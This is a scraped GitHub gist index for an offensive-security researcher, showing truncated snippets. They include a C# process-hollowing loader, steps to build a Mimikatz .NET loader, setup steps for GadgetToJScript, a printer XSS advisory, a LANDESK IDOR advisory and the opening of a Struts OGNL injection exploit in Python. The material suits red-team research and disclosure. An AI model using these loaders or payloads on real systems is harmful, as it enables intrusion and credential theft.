Skip to content

Instantly share code, notes, and snippets.


Mohamed El Azaar med0x2e

View GitHub Profile
med0x2e / process-hollowing.cs
Last active Mar 28, 2021
Process Hollowing (slightly updated to work with G2JS) - credits for the initial code go to @smgorelik and @ambray
View process-hollowing.cs
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
namespace Hollowing
public class Loader
public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");
med0x2e / steps.txt
Last active Apr 16, 2021
Steps to run GadgetToJScript on linux (wine)
View steps.txt
1- apt-get install mono-complete
2- apt-get install wine winetricks -y
3- winetricks dotnet35
4- winetricks dotnet48
5- dpkg --add-architecture i386 && apt-get update && apt-get install wine32
6- rm -Rf ~/.wine
7- WINEPREFIX=~/.wine32 WINEARCH=win32 wineboot
8- wine GadgetToJScript.NET3.5.exe -r -c helloworld.cs -d System.Windows.Forms.dll -w hta -o hello
View Steps.txt
1. Download the latest release of mimikatz:
2. Get Mimikatz PE Loader from
3. use @pljoel katz.cs cs file and uncomment the building lines available on Delivery.Program.Main() & comment Exec() line of code.
4. Build it to generate file.b64, copy its content and replace Package.file string available on payload.txt file.
6. Make sure payloadPath var is properly set on "TestAssemblyLoader.cs"
View gist:2715d32602ba688ea3bc239a3d5f8214
[Suggested description]
Samsung printer model "SCX-824" web console is vulnerable to
a reflected Cross-Site-Scripting (XSS) vulnerability which can be
triggered by using "print from file" feature which forward the
user to the following URL:
The vulnerable parameter "msg" is not properly encoded before interepred as HTML/JS.
View sct.png
<?XML version="1.0"?>
med0x2e / compiler-input-obj.xml
Last active Aug 28, 2018
CompilerInput Object
View compiler-input-obj.xml
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="" xmlns="">
<files xmlns:d2p1="">
<parameters xmlns:d2p1="">
<assemblyNames xmlns:d3p1="" xmlns="">
<d3p1:anyType xmlns:d4p1="" i:type="d4p1:string">C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.IO.Compression.dll</d3p1:anyType>
<compilerOptions i:nil="true" xmlns="" />
med0x2e / katz.whatever
Last active Apr 30, 2021
Mimikatz .NET Loader
View katz.whatever
using System;
using System.IO;
using System.IO.Compression;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Workflow.Activities;
public class KatzWFCompiler : SequentialWorkflowActivity
public KatzWFCompiler()
med0x2e / CVE-2017-11463
Last active Dec 15, 2017
View CVE-2017-11463
[Suggested description]
In LANDESK Management Suite 2016.4 and 2017.x, an Unrestricted
Direct Object Reference leads to referencing/updating objects
belonging to other users. In other words, a normal user
can send requests to a specific URI with the
target user's username in an HTTP payload in order to retrieve a
key/token and use it to access/update objects belonging to other
users. Such objects could be user profiles, tickets, incidents, etc.
[Additional Information]
import urllib2
import httplib
def exploit(url, cmd):
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."